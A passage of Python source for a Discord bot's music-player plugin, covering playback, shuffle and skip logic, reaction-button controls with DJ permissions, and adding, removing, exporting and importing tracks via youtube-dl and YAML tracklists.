asyncio.ensure_future(self.update_mirror(new_notification=self.notification))\n self.embed.set_field_at(4, name='Notification:', value=self.notification)\n\n def _skip_track(self):\n \"\"\"Skips the current track (even if paused).\"\"\"\n delta = 1 if self.mode == Modes.PLAYLIST else 0\n if self.mode == Modes.PLAYLIST and self.shuffle:\n if self.now_playing:\n self.shuffle_stack.append(self.now_playing.id)\n if len(self.tracklist) > 1:\n new_track_index = random.randint(0, len(self.tracklist) - 2)\n if new_track_index >= self.track_index:\n new_track_index += 1\n else:\n new_track_index = 0\n else:\n new_track_index = self.track_index + delta\n asyncio.ensure_future(self.play(track_index=new_track_index))\n\n async def _track_timer(self, sleeptime, use_skip=False):\n \"\"\"Sleeps until the end of the song or cutoff. Plays the next track afterwards.\"\"\"\n logger.debug(\"Sleeping for %s seconds. Time: %s\", sleeptime, time.time())\n track_check = self.now_playing\n await asyncio.sleep(sleeptime)\n logger.debug(\"Finished sleeping for %s seconds. Time: %s\", sleeptime, time.time())\n await self.update_state()\n if self.state == States.STOPPED or track_check != self.now_playing:\n logger.debug(\"The track timer resumed?\")\n return\n while self.state == States.LOADING:\n logger.warn(\"Player was moved while the track was loading.\")\n await asyncio.sleep(1)\n if self.mode == Modes.PLAYLIST and self.shuffle:\n logger.debug(\"Adding track %s to the shuffle stack\", track_check.title)\n self.shuffle_stack.append(track_check.id)\n if len(self.tracklist) > 1:\n new_track_index = random.randint(0, len(self.tracklist) - 2)\n if new_track_index >= self.track_index:\n new_track_index += 1\n else:\n new_track_index = 0\n asyncio.ensure_future(self.play(track_index=new_track_index, skipped=use_skip))\n else:\n logger.debug('_track_timer is moving on: %s', use_skip)\n asyncio.ensure_future(self.play(skipped=use_skip))\n\n def _get_delay(self, config_update=False): # Gets track delay with cutoff\n if self.now_playing.duration > self.threshold:\n duration = self.cutoff\n use_skip = self.now_playing\n else:\n duration = self.now_playing.duration\n use_skip = False\n if config_update:\n current_progress = self.progress + time.time() - self.start_time\n else:\n current_progress = self.progress\n return (max(duration - current_progress, 0), use_skip)\n\n async def play(self, track_index=None, skipped=False, wrap_track_numbers=True, author=None):\n \"\"\"Plays (the given track).\n\n Keyword arguments:\n track_index -- The specific track to play.\n In queue mode, -1 indicates to repeat the current track.\n skipped -- Whether or not the last track was skipped due to a length constraint.\n wrap_track_numbers -- Wraps out-of-bounds track indices to the nearest edge.\n author -- If provided, displays a notification on who started the player.\n \"\"\"\n # Ignore loading player\n if self.state in (States.LOADING, States.STOPPED):\n return\n\n # Resume player if paused\n if (self.state == States.PAUSED and\n self.now_playing and self.progress and track_index is None):\n self.state = States.PLAYING\n self.voice_client.resume()\n self.start_time = time.time()\n self.timer_task = asyncio.ensure_future(self._track_timer(*self._get_delay()))\n author_text = '{} resumed the player'.format(author.mention) if author else ''\n asyncio.ensure_future(self.update_interface(notification_text=author_text))\n self.autopaused = False # Reset single-time resume state\n return\n\n # No more tracks left to play\n if len(self.tracklist) == 0 and not (track_index == -1 and self.state == States.PLAYING):\n self.notification = \"There are no more tracks in the queue\"\n if self.voice_client.is_playing():\n self.voice_client.stop()\n self.source = None\n self.now_playing = None\n self.first_time_startup = True # Reset so non-DJs can start the player again\n self.progress = 0\n self.state = States.PAUSED\n asyncio.ensure_future(self.update_interface(ignore_ratelimit=True))\n asyncio.ensure_future(self.update_satellite())\n return\n\n # No track index was given - act as a skip\n if track_index is None and self.now_playing:\n if self.mode == Modes.PLAYLIST:\n self.track_index = (self.track_index + 1) % len(self.tracklist)\n\n # A specific track index was given\n elif track_index is not None:\n if track_index != -1 and not 0 <= track_index < len(self.tracklist):\n if wrap_track_numbers:\n if track_index >= len(self.tracklist):\n track_index = 0\n elif track_index < 0:\n track_index = -1\n else:\n self.notification = (\n 'Index must be between 1 and {} inclusive'.format(len(self.tracklist)))\n asyncio.ensure_future(self.update_interface())\n return\n\n # Wrap a backwards skip to the end of the playlist in playlist mode\n if self.mode == Modes.PLAYLIST:\n if track_index == -1:\n track_index = len(self.tracklist) - 1\n self.track_index = track_index\n\n # Track from playlist\n if self.mode == Modes.PLAYLIST:\n track = self.tracklist[self.track_index]\n\n # Track from queue\n else:\n\n # Repeat current track\n if track_index == -1:\n if self.now_playing:\n track = self.now_playing\n else:\n return\n\n # Skip to specific track by removing it from the database first\n else:\n if track_index is None:\n track_index = 0\n track = self.tracklist[0 if track_index == -1 else track_index]\n data.db_delete(\n self.bot, 'playlist', table_suffix=self.guild.id,\n where_arg='id=%s', input_args=[track.id])\n self.update_tracklist()\n\n self.autopaused = False # Reset single-time resume state\n\n # Setup the player\n logger.debug(\"Preparing to play the next track.\")\n self.page = int(self.track_index / 5)\n del self.skip_voters[:]\n if self.state == States.PLAYING:\n if self.voice_client.is_playing():\n self.voice_client.stop()\n if self.timer_task:\n self.timer_task.cancel()\n self.first_time_startup = not bool(self.now_playing)\n self.state = States.LOADING\n self.now_playing = track\n sound_file = data.get_from_cache(self.bot, None, url=track.url)\n\n # Audio not found in cache, download now instead\n if not sound_file:\n asyncio.ensure_future(self.update_interface())\n logger.debug(\"Not found in cache. Downloading...\")\n\n try:\n options = {'format': 'bestaudio/best', 'noplaylist': True}\n downloader = YoutubeDL(options)\n sound_file = await data.add_to_cache_ydl(self.bot, downloader, track.url)\n except Exception as e: # Attempt to redownload from base url\n logger.warn(\"Failed to download track %s\\n%s\", track.url, e)\n self.notification = \"Failed to download {}. Failsafe skipping...\".format(\n track.title)\n self.state = States.PAUSED\n self._skip_track()\n return\n\n # TODO: Add exception handling\n # TODO: Change ffmpeg_options for docker version\n #ffmpeg_options = '-protocol_whitelist \"file,http,https,tcp,tls\"'\n #audio_source = discord.FFmpegPCMAudio(sound_file, before_options=ffmpeg_options)\n audio_source = discord.FFmpegPCMAudio(sound_file)\n\n # Set volume and play audio\n audio_source = discord.PCMVolumeTransformer(audio_source, volume=self.volume)\n self.voice_client.play(audio_source)\n self.source = audio_source\n\n # Record progress time\n self.progress = 0\n self.start_time = time.time()\n self.state = States.PLAYING\n self.timer_task = asyncio.ensure_future(self._track_timer(*self._get_delay()))\n if skipped:\n self.notification = (\n 'The track *{}* was cut short because it exceeded '\n 'the song length threshold of {} seconds.'.format(\n _build_hyperlink(self.bot, skipped), self.threshold))\n elif self.first_time_startup and author:\n self.notification = '{} started the player'.format(author.mention)\n\n asyncio.ensure_future(self.update_interface(ignore_ratelimit=True))\n data.add(self.bot, __name__, 'last_index', self.track_index, guild_id=self.guild.id)\n\n async def pause(self, author=None):\n if (self.state in (States.PAUSED, States.LOADING, States.STOPPED) or\n self.voice_client is None or not self.voice_client.is_playing()):\n return\n if self.timer_task:\n self.timer_task.cancel()\n self.voice_client.pause()\n self.state = States.PAUSED\n self.progress += time.time() - self.start_time\n author_text = '{} paused the player'.format(author.mention) if author else ''\n asyncio.ensure_future(self.update_interface(\n notification_text=author_text, ignore_ratelimit=True))\n\n async def stop(self, text=\"The player has been stopped.\"):\n logger.debug(\"Stopping the player!\")\n await utilities.stop_audio(self.bot, self.guild)\n self.state = States.STOPPED\n self.now_playing = None\n try:\n if self.voice_client:\n self.voice_client.stop()\n if self.timer_task:\n self.timer_task.cancel()\n if self.command_task:\n self.command_task.cancel()\n if self.progress_task:\n self.progress_task.cancel()\n if self.state_check_task:\n self.state_check_task.cancel()\n if self.chat_mirror_task:\n self.chat_mirror_task.cancel()\n except Exception as e:\n logger.warn(\"Failed to stop some task. %s\", e)\n try:\n asyncio.ensure_future(self.satellite_message.delete())\n asyncio.ensure_future(self.mirror_message.delete())\n asyncio.ensure_future(self.message.clear_reactions())\n asyncio.ensure_future(self.message.edit(content=text, embed=None))\n except Exception as e:\n logger.warn(\"Failed to modify the original message %s\", e)\n pass\n\n async def track_navigate(self, use_skip, member):\n \"\"\"Navigates the track (next, previous, or repeat). Returns True if successful.\"\"\"\n is_dj = data.has_custom_role(self.bot, __name__, 'dj', member=member)\n\n # Build skip text\n use_repeat = time.time() - self.start_time >= 10 and self.now_playing\n self_skip = False\n if use_skip:\n skip_format = '{} skipped {}'\n if self.now_playing and self.now_playing.userid == member.id:\n self_skip = True\n elif not self.now_playing:\n skip_format = '{} played the queued track'\n else:\n if self.now_playing and (use_repeat or self.mode == Modes.QUEUE):\n skip_format = '{} repeated {}'\n elif self.now_playing:\n skip_format = '{} skipped back from {}'\n else:\n skip_format = '{} skipped back a track'\n\n # Skip track only if the user is a DJ or was the one that added it\n if not self_skip and not is_dj and not self.control == Control.ALL:\n return False\n\n if self.now_playing:\n track_details = _build_track_details(\n self.bot, self.now_playing, self.track_index)\n else:\n track_details = ''\n self.notification = skip_format.format(member.mention, track_details)\n\n # Determine track delta\n if self.mode == Modes.PLAYLIST:\n # Repeat track if more than 10 seconds have elapsed\n start_delta = 1 if self.now_playing else 0\n delta = start_delta if use_skip else (0 if use_repeat else -1)\n else:\n delta = 0 if use_skip else -1\n\n if self.mode == Modes.PLAYLIST and self.shuffle and delta != 0:\n last_track = None\n if not use_skip and self.shuffle_stack: # Check shuffle stack first\n last_track_id = self.shuffle_stack.pop()\n for new_track_index, track in enumerate(self.tracklist):\n if track.id == last_track_id:\n last_track = track\n break\n if last_track is None:\n if self.now_playing:\n self.shuffle_stack.append(self.now_playing.id)\n if len(self.tracklist) > 1:\n new_track_index = random.randint(0, len(self.tracklist) - 2)\n if new_track_index >= self.track_index:\n new_track_index += 1\n else:\n new_track_index = 0\n else:\n new_track_index = self.track_index + delta\n asyncio.ensure_future(self.play(track_index=new_track_index))\n return True\n\n async def _command_listener(self, resume=False):\n valid_commands = ('⏮', '⏯', '⏭', '⏹', '🔀', '🎵', '⬅', '⏺', '➡', '⏏', '❓')\n\n async def _add_buttons():\n \"\"\"Adds the buttons in the background to show interface immediately.\"\"\"\n for reaction in valid_commands:\n try:\n await self.message.add_reaction(reaction)\n except Exception as e:\n logger.warn(\"Failed to add reaction: %s\", e)\n\n # Check reactions are proper\n for reaction in self.message.reactions:\n users = await self.bot.get_reaction_users(reaction)\n for user in users:\n if user != self.bot.user:\n await self.message.remove_reaction(reaction.emoji, user)\n\n # Safety interface update\n asyncio.ensure_future(self.update_interface())\n await asyncio.sleep(1)\n self.loading_interface = False\n\n self.progress_task = asyncio.ensure_future(self._progress_loop())\n self.state_check_task = asyncio.ensure_future(self._listener_loop())\n self.chat_mirror_task = asyncio.ensure_future(self._chat_mirror_loop())\n self.page = int(self.track_index / 5)\n asyncio.ensure_future(self.update_interface())\n asyncio.ensure_future(_add_buttons())\n\n # Startup - finished loading basics\n if self.state == States.LOADING:\n self.state = States.PLAYING if resume else States.PAUSED\n\n try: # TODO: Remove try/except block\n while True:\n # Wait on reaction command\n kwargs = {'check': lambda r, u: r.message.id == self.message.id and not u.bot}\n logger.debug(\"Waiting on command...\")\n result = await self.bot.wait_for('reaction_add', **kwargs)\n if result is None or self.state == States.STOPPED:\n return\n elif result[1] == self.bot.user:\n continue\n\n # Check validity of reaction\n command, member = result[0].emoji, result[1]\n logger.debug(\"Player interaction: %s: %s\", member, command)\n is_dj = data.has_custom_role(self.bot, __name__, 'dj', member=member)\n if not await utilities.can_interact(self.bot, member, channel_id=self.channel.id):\n continue\n asyncio.ensure_future(self.message.remove_reaction(command, member))\n if not is_dj and (member not in self.voice_channel.members or\n self.state == States.LOADING or\n command not in valid_commands):\n continue\n\n # Check player control type\n restricted_commands = [\n set(), # Public\n (valid_commands[0],) + valid_commands[3:5], # Partially public\n valid_commands[:10] # DJ Only\n ][self.control]\n if command in restricted_commands and not is_dj:\n logger.debug(\"Ignoring command (insufficient permissions)\")\n continue\n\n # Play/pause and skip\n if command in valid_commands[:3]:\n logger.debug(\"Play|pause and skip selected\")\n\n # Play/pause\n if command == valid_commands[1]:\n permissions = self.control == Control.ALL or is_dj\n if self.state == States.PLAYING and permissions:\n asyncio.ensure_future(self.pause(author=member))\n elif self.state == States.PAUSED:\n if permissions or self.autopaused or self.first_time_startup:\n asyncio.ensure_future(self.play(author=member))\n\n # Skip\n elif self.state != States.LOADING:\n use_skip = command == valid_commands[2]\n asyncio.ensure_future(self.track_navigate(use_skip, member))\n\n # Stop player\n elif command == valid_commands[3]:\n await self.stop(\n text=\"The player has been stopped by {}.\".format(member.mention))\n return\n\n # Shuffle mode\n elif command == valid_commands[4]:\n if self.mode == Modes.PLAYLIST:\n self.shuffle = not self.shuffle\n data.add(\n self.bot, __name__, 'shuffle', self.shuffle, guild_id=self.guild.id)\n asyncio.ensure_future(self.update_interface())\n\n # Generate tracklist\n elif command == valid_commands[5]:\n logger.debug(\"Tracklist selected\")\n if self.tracklist:\n if self.tracklist_time != self.tracklist_update_time:\n self.tracklist_time = self.tracklist_update_time\n tracklist_string = await _build_tracklist(\n self.bot, self.guild, self.tracklist)\n tracklist_file = utilities.get_text_as_file(tracklist_string)\n url = await utilities.upload_to_discord(\n self.bot, tracklist_file, filename='tracklist.txt')\n self.tracklist_url = url\n\n text = '[Click here]({}) to download the tracklist'.format(\n self.tracklist_url)\n asyncio.ensure_future(self.update_interface(notification_text=text))\n\n # Track list navigation\n elif command in valid_commands[6:9]:\n logger.debug(\"Track list navigation selected\")\n if command == valid_commands[7]: # Reset to the current page\n self.page = int(self.track_index / 5)\n else:\n self.page += -1 if command == valid_commands[6] else 1\n asyncio.ensure_future(self.update_interface(ignore_ratelimit=True))\n\n # Voteskip\n elif command == valid_commands[9]:\n logger.debug(\"Vote skip selected\")\n if self.state != States.PLAYING or member.bot:\n continue\n elif member.id in self.skip_voters:\n self.skip_voters.remove(member.id)\n logger.debug(\"Vote by %s was removed.\", member)\n elif member in self.voice_channel.members:\n self.skip_voters.append(member.id)\n logger.debug(\"Vote by %s was added.\", member)\n else:\n continue\n self.update_listeners()\n\n # Help\n elif command == valid_commands[10]:\n logger.debug(\"Help selected\")\n button_help = (\n '⏮, ⏯, ⏭, ⏹: Back, Play|Pause, Next, Stop\\n'\n '🔀: Shuffle (playlist mode only)\\n'\n '🎵: Generate tracklist\\n'\n '⬅, ➡: Track page navigation\\n'\n '⏺: Reset track page to current playing track\\n'\n '⏏: Voteskip (must be listening)\\n'\n '❓: This help page'\n )\n permissions_help = (\n '**DJs only:** Only DJs can manage the player.\\n'\n '**Partially public:** Everybody can '\n 'add tracks, change track pages, and voteskip. '\n 'You can skip your own tracks as well.\\n'\n '**Public:** Everybody has full control '\n '(except removing other people\\'s '\n 'tracks and importing tracklists).'\n )\n status_help = (\n ':arrow_forward: (Blue): Playing a track\\n'\n ':pause_button: (White): Paused\\n'\n ':arrows_counterclockwise: (Orange): Loading'\n )\n command_help = (\n 'To add tracks:\\n`{0}`\\u200b{1[3].help_string}\\n'\n 'To remove tracks:\\n`{0}`\\u200b{1[4].help_string}\\n'\n 'To add tracks and/or skip to a track:\\n'\n '`{0}`\\u200b{1[11].help_string}\\n\\n'\n 'Examples (using the shortcut):\\n'\n '`{0}add Erasure Always`\\n'\n '`{0}remove 1`\\n'\n '`{0}play Toto Africa`\\n'\n '`{0}play track 7`\\n'\n 'For more, type: `help playlist`'\n ).format(\n utilities.get_invoker(self.bot, guild=self.guild),\n self.bot.commands['playlist'].subcommands)\n help_embed = discord.Embed(title=':question: Music player help')\n help_embed.add_field(name='Basic usage:', value=command_help)\n help_embed.add_field(name='Buttons:', value=button_help)\n help_embed.add_field(name='Control types:', value=permissions_help)\n help_embed.add_field(name='Status icons:', value=status_help)\n asyncio.ensure_future(member.send(embed=help_embed))\n\n except Exception as e:\n if not isinstance(e, asyncio.CancelledError):\n self.bot.extra = e\n logger.warn(\"Something bad happened (%s). %s\", type(e), e)\n\n\n# Link builders\ndef _build_hyperlink(bot, track):\n full_title = track.title.replace('`', '').replace('*', '')\n title = _truncate_title(full_title)\n return '[{0}]({1} \"{2} (added by <@{3}>)\")'.format(title, track.url, full_title, track.userid)\n\n\ndef _build_shortlink(bot, track):\n \"\"\"Like _build_hyperlink, but for the URL portion only.\"\"\"\n display_url = 'http://dis.gd' if len(track.url) > URL_LIMIT else track.url\n display_title = _truncate_title(track.title.replace('`', ''))\n return '({} \"{} (added by <@{}>)\")'.format(display_url, display_title, track.userid)\n\n\ndef _build_track_details(bot, track, index):\n \"\"\"Creates a string that shows a one liner of the track\"\"\"\n full_title = track.title.replace('`', '').replace('*', '')\n title = _truncate_title(full_title)\n return '[[Track {}]({} \"{} (added by <@{}>)\")] ({}) *{}*'.format(\n index + 1, track.url, full_title, track.userid,\n utilities.get_time_string(track.duration), title)\n\n\ndef _truncate_title(text, limit=TITLE_LIMIT):\n \"\"\"Truncates the text to the given limit if it is too long.\"\"\"\n return (text[:limit] + '…') if len(text) > limit else text\n\n\ndef _get_tracklist(bot, guild):\n cursor = data.db_select(\n bot, from_arg='playlist', additional='ORDER BY id ASC', table_suffix=guild.id)\n return cursor.fetchall() if cursor else ()\n\n\ndef _get_music_player(bot, guild):\n return data.get(bot, __name__, 'music_player', guild_id=guild.id, volatile=True)\n\n\nasync def _check_active_player(bot, guild, autodelete_time=5):\n \"\"\"Tries to get the active music player and whether or not the interface is active.\"\"\"\n import_lock = data.get(bot, __name__, 'import_lock', guild_id=guild.id, volatile=True)\n if import_lock:\n raise CBException(\"A track import is in progress. Please wait for it to finish.\")\n music_player = _get_music_player(bot, guild)\n if music_player:\n await music_player.update_state()\n use_player_interface = music_player.state is not States.STOPPED\n else:\n use_player_interface = False\n autodelete = autodelete_time if use_player_interface else 0\n return music_player, use_player_interface, autodelete\n\n\ndef _check_total_tracks_limits(bot, author):\n \"\"\"Ensures that limits of the track list are respected. Returns tracklist.\"\"\"\n\n # Limits\n user_track_limit = data.get(\n bot, __name__, key='user_track_limit', guild_id=author.guild.id,\n default=configurations.get(bot, __name__, key='max_user_track_limit'))\n total_track_limit = data.get(\n bot, __name__, key='total_track_limit', guild_id=author.guild.id,\n default=configurations.get(bot, __name__, key='max_total_track_limit'))\n\n # Checks\n tracklist = _get_tracklist(bot, author.guild)\n if data.has_custom_role(bot, __name__, 'dj', member=author): # DJs ignore limits\n return tracklist\n if total_track_limit and len(tracklist) >= total_track_limit:\n raise CBException(\"The track limit of {} has been reached.\".format(total_track_limit))\n user_tracks = [it for it in tracklist if it.userid == author.id]\n if user_track_limit and len(user_tracks) >= user_track_limit:\n raise CBException(\n \"You cannot add any more songs right now (limit {}).\".format(user_track_limit))\n return tracklist\n\n\nasync def _add_track_with_url(bot, guild, check_url, user_id=0, timestamp=0):\n \"\"\"Checks the given url and adds it to the database.\"\"\"\n options = {'format': 'bestaudio/best', 'noplaylist': True, 'default-search': 'ytsearch'}\n downloader = YoutubeDL(options)\n\n # Check for a direct URL (SO: 7160737)\n try:\n test = urlparse(check_url)\n is_url = test.scheme and test.netloc and test.path\n except:\n is_url = False\n\n if not is_url and not check_url.lower().startswith('ytsearch:'):\n check_url = 'ytsearch:' + check_url.strip()\n\n # Get information about the track\n try:\n info = await utilities.future(downloader.extract_info, check_url, download=False)\n if not is_url: # Select first result on search\n info = info['entries'][0]\n check_url = info['webpage_url']\n except BotException as e:\n raise e # Pass up\n except Exception as e:\n raise CBException(\"Failed to fetch information from the URL.\", e=e)\n return await _add_track_to_db(\n bot, guild, check_url, info, user_id=user_id, timestamp=timestamp)\n\n\nasync def _add_track_to_db(bot, guild, check_url, info, user_id=0, timestamp=0):\n \"\"\"Adds the given track info to the database.\"\"\"\n hard_threshold = configurations.get(bot, __name__, key='hard_threshold')\n bot.extra = info\n try:\n chosen_format = info['formats'][0]\n download_url = chosen_format['url']\n title = info.get('title', 'Unknown')\n thumbnail = info.get('thumbnail', None)\n likes = info.get('like_count', None)\n dislikes = info.get('dislike_count', None)\n views = info.get('view_count', None)\n description = info.get('description', None)\n upload_date = info.get('upload_date', None)\n uploader = info.get('uploader', None)\n if 'duration' in info:\n duration = int(info['duration'])\n else: # Manual download and check\n extension = chosen_format['ext']\n sound_file, filename = await utilities.download_url(\n bot, download_url, extension=extension, include_name=True)\n duration = int(TinyTag.get(sound_file).duration)\n utilities.delete_temporary_file(bot, filename)\n except BotException as e:\n raise e # Pass up\n except Exception as e:\n raise CBException(\"Failed to get duration from the URL.\", e=e)\n\n if duration > hard_threshold:\n raise CBException(\n \"Song is longer than the hard threshold of {} seconds.\".format(hard_threshold))\n\n # Prepare data for insertion\n extra_data = {}\n if thumbnail is not None:\n extra_data['thumbnail'] = thumbnail\n if likes is not None:\n extra_data['likes'] = likes\n if dislikes is not None:\n extra_data['dislikes'] = dislikes\n if views is not None:\n extra_data['views'] = views\n if description is not None:\n extra_data['description'] = description\n if upload_date is not None:\n extra_data['uploaded'] = '{}/{}/{}'.format(\n upload_date[4:6], upload_date[6:8], upload_date[:4])\n if uploader is not None:\n extra_data['uploader'] = uploader\n entry_data = [\n check_url,\n download_url,\n title,\n duration,\n user_id,\n timestamp if timestamp else time.time(),\n Json(extra_data)\n ]\n\n return data.db_insert(\n bot, 'playlist', table_suffix=guild.id, input_args=entry_data,\n create='playlist_template')\n\n\nasync def add_track(bot, context):\n \"\"\"Adds a track to the playlist (via command).\"\"\"\n music_player, use_player_interface, autodelete = await _check_active_player(bot, context.guild)\n\n # Check channel restriction\n channel_id = data.get(bot, __name__, 'channel', guild_id=context.guild.id)\n if not channel_id:\n raise CBException(\"No channel configured for the music player.\")\n channel_restriction = data.get_channel(bot, channel_id)\n is_dj = data.has_custom_role(bot, __name__, 'dj', member=context.author)\n if context.channel.id != channel_id and not is_dj:\n raise CBException(\"You can only add tracks in {}\".format(channel_restriction.mention))\n\n # Check control restriction\n control = data.get(\n bot, __name__, 'control', guild_id=context.guild.id, default=Control.PARTIAL)\n if not is_dj and control == Control.DJS:\n raise CBException(\"You must be a DJ to add tracks.\", autodelete=autodelete)\n\n default_threshold = configurations.get(bot, __name__, key='max_threshold')\n default_cutoff = configurations.get(bot, __name__, key='max_cutoff')\n guild_id = context.guild.id\n threshold = data.get(bot, __name__, 'threshold', guild_id=guild_id, default=default_threshold)\n cutoff = data.get(bot, __name__, 'cutoff', guild_id=guild_id, default=default_cutoff)\n\n # Add track to the playlist\n check_url = context.arguments[0]\n try:\n tracklist = _check_total_tracks_limits(bot, context.author)\n cursor = await _add_track_with_url(\n bot, context.guild, check_url, user_id=context.author.id)\n track = cursor.fetchone()\n except BotException as e:\n e.autodelete = autodelete\n raise e\n\n response = '{} added {}'.format(\n context.author.mention, _build_track_details(bot, track, len(tracklist)))\n if track.duration > threshold:\n response += (\n \"\\nTrack is longer than the threshold length ({} seconds), so \"\n \"only the first {} seconds will be played\".format(threshold, cutoff))\n\n # Check the music player again, as it may have stopped while we were download the url\n music_player, use_player_interface, autodelete = await _check_active_player(bot, context.guild)\n if use_player_interface:\n music_player.update_tracklist()\n await music_player.update_interface(notification_text=response)\n\n return Response(\n embed=discord.Embed(description=response),\n message_type=MessageTypes.REPLACE if use_player_interface else MessageTypes.NORMAL,\n delete_after=autodelete if use_player_interface else None,\n extra=autodelete if use_player_interface else None)\n\n\nasync def remove_track(bot, context):\n music_player, use_player_interface, autodelete = await _check_active_player(bot, context.guild)\n\n # Check track index\n tracklist = _get_tracklist(bot, context.guild)\n if not tracklist:\n raise CBException(\"The playlist queue is empty.\", autodelete=autodelete)\n index = context.arguments[0] - 1\n if not 0 <= index < len(tracklist):\n raise CBException(\"Invalid index. Must be between 1 and {} inclusive.\".format(\n len(tracklist)), autodelete=autodelete)\n\n # Check permissions\n is_dj = data.has_custom_role(bot, __name__, 'dj', member=context.author)\n control = data.get(\n bot, __name__, 'control', guild_id=context.guild.id, default=Control.PARTIAL)\n track = tracklist[index]\n if control == Control.DJS and not is_dj:\n raise CBException(\"You must be a DJ to remove entries.\", autodelete=autodelete)\n elif track.userid != context.author.id and not is_dj:\n raise CBException(\n \"You must be the user who added the entry, or a DJ.\", autodelete=autodelete)\n\n data.db_delete(\n bot, 'playlist', table_suffix=context.guild.id,\n where_arg='id=%s', input_args=[track.id])\n response = '{} removed {}'.format(\n context.author.mention, _build_track_details(bot, track, index))\n\n # Change current index if necessary\n if use_player_interface:\n music_player.update_tracklist()\n if music_player.mode == Modes.PLAYLIST:\n use_skip = index == music_player.track_index\n if index <= music_player.track_index: # Shift track index down\n music_player.track_index -= 1\n if use_skip: # Skip track due to removing the current track\n music_player._skip_track()\n await music_player.update_interface(notification_text=response)\n\n return Response(\n embed=discord.Embed(description=response),\n message_type=MessageTypes.REPLACE if use_player_interface else MessageTypes.NORMAL,\n delete_after=autodelete if use_player_interface else None,\n extra=autodelete if use_player_interface else None)\n\n\nasync def _build_tracklist(bot, guild, tracklist):\n header = (\n '# Tracklist generated: {3[1]} {3[0]}\\r\\n'\n '# Guild: {0}\\r\\n'\n '# Total tracks: {1}\\r\\n'\n '# Runtime: {2}\\r\\n'\n ).format(\n guild.name, len(tracklist),\n utilities.get_time_string(sum(it.duration for it in tracklist), text=True, full=True),\n utilities.get_timezone_offset(\n bot, guild_id=guild.id, utc_dt=datetime.utcnow(), as_string=True))\n tracklist_text_list = [header]\n template = (\n '{}: |\\r\\n'\n ' {}\\r\\n' # Title\n ' {}\\r\\n' # URL\n ' Added by {} at {} {}\\r\\n' # Info\n ' Duration: {} ID|Timestamp: {}|{}\\r\\n' # Duration, internal info\n )\n all_guild_members = await guild.fetch_members(limit=None).flatten()\n for index, track in enumerate(tracklist):\n track_author = (\n (await data.fetch_member(bot, track.userid, safe=True, search=all_guild_members)) or\n 'Unknown')\n offset, upload_time = utilities.get_timezone_offset(\n bot, guild_id=guild.id, utc_seconds=track.timestamp, as_string=True)\n upload_time_text = time.strftime('%H:%M %m/%d/%Y', time.gmtime(upload_time))\n tracklist_text_list.append(template.format(\n index + 1, track.title, track.url, track_author, upload_time_text, offset,\n utilities.get_time_string(track.duration), track.userid, track.timestamp))\n\n return '\\r\\n'.join(tracklist_text_list)\n\n\nasync def format_tracklist(bot, context):\n music_player, use_player_interface, autodelete = await _check_active_player(bot, context.guild)\n\n # Format tracklist into user-friendly yaml\n tracklist = _get_tracklist(bot, context.guild)\n if not tracklist:\n raise CBException(\"The playlist queue is empty.\", autodelete=autodelete)\n\n tracklist_string = await _build_tracklist(bot, context.guild, tracklist)\n tracklist_file = utilities.get_text_as_file(tracklist_string)\n\n if use_player_interface:\n url = await utilities.upload_to_discord(bot, tracklist_file, filename='tracklist.txt')\n await music_player.update_interface(\n notification_text='[Click here]({}) to download the current tracklist'.format(url))\n return Response(content='Tracklist file updated.', delete_after=5)\n else:\n return Response(\n content='Tracks:', file=discord.File(tracklist_file, filename='tracklist.txt'))\n\n\nasync def import_tracklist(bot, context):\n music_player, use_player_interface, autodelete = await _check_active_player(bot, context.guild)\n use_youtube_playlist = 'youtube' in context.options\n if not (bool(context.message.attachments) ^ use_youtube_playlist):\n raise CBException(\n \"Must include an attachment or a YouTube playlist URL.\", autodelete=autodelete)\n if not data.has_custom_role(bot, __name__, 'dj', member=context.author):\n raise CBException(\"You must be a DJ to import tracks.\")\n if use_player_interface:\n raise CBException(\n 'The player must be stopped before importing tracks.', autodelete=autodelete)\n\n data.add(bot, __name__, 'import_lock', True, guild_id=context.guild.id, volatile=True)\n try:\n\n # Get tracklist data from playlist URL\n if use_youtube_playlist:\n downloader = YoutubeDL()\n info = await utilities.future(\n downloader.extract_info, context.options['youtube'], download=False)\n # tracklist_data = list(it['webpage_url'] for it in info['entries'])\n tracklist_data = info['entries']\n\n # Get tracklist data from file\n else:\n use_youtube_playlist = False\n file_url = context.message.attachments[0].url\n tracklist_file = await utilities.download_url(bot, file_url, use_fp=True)\n\n tracklist_data = yaml.safe_load(tracklist_file)\n if isinstance(tracklist_data, str): # Read lines instead\n tracklist_file.seek(0)\n tracklist_blob = tracklist_file.read().decode('utf8').replace('\\r\\n', '\\n').strip()\n tracklist_data = tracklist_blob.split('\\n')\n\n logger.debug(\"Tracklist data: %s\", tracklist_data)\n\n if not tracklist_data or len(tracklist_data) == 0:\n raise CBException(\"The tracklist file is empty.\")\n elif len(tracklist_data) > 100:\n raise CBException(\"Cannot import more than 100 tracks at a time.\")\n except Exception as e:\n data.remove(bot, __name__, 'import_lock', guild_id=context.guild.id, volatile=True)\n if isinstance(e, BotException):\n raise e\n else:\n raise CBException(\"Failed to load the tracklist file.\", e=e)\n\n return Response(\n content=\"Importing tracks...\",\n message_type=MessageTypes.ACTIVE,\n extra=(tracklist_data, use_youtube_playlist),\n extra_function=_import_tracklist_status)\n\n\nasync def _import_tracklist_status(bot, context, response):\n last_update_time = time.time()\n total_imported = 0\n tracklist_data, use_youtube_playlist = response.extra\n\n async def _update_notification(last_update_time):\n if time.time() - last_update_time > 5:\n await response.message.edit(content=\"Importing tracks... [ {} / {} ]\".format(\n total_imported, len(tracklist_data)))\n return time.time()\n return last_update_time\n\n try:\n\n if use_youtube_playlist:\n for info in tracklist_data:\n await _add_track_to_db(\n bot, context.guild, info['webpage_url'], info,\n context.author.id, int(time.time()))\n total_imported += 1\n last_update_time = await _update_notification(last_update_time)\n\n else:\n if isinstance(tracklist_data, list):\n tracklist_data = OrderedDict((it[0], it[1]) for it in enumerate(tracklist_data))\n for _, track_blob in sorted(tracklist_data.items()):\n cleaned = track_blob.strip()\n if not cleaned:\n continue\n elif '\\n' in cleaned:\n title, url, _, info, _ = track_blob.split('\\n')\n user_id, _, timestamp = info.split()[3].partition('|')\n else:\n title = url = track_blob\n user_id, timestamp = context.author.id, time.time()\n\n _check_total_tracks_limits(bot, context.author)\n await _add_track_with_url(bot, context.guild, url, int(user_id), int(timestamp))\n total_imported += 1\n last_update_time = await _update_notification(last_update_time)\n\n except Exception as e:\n data.remove(bot, __name__, 'import_lock', guild_id=context.guild.id, volatile=True)\n try:\n raise CBException(\"Failed to import track {}\".format(title), e=e)\n except NameError:\n raise CBException(\"Failed to import tracks.\", e=e)\n\n data.remove(bot, __name__, 'import_lock', 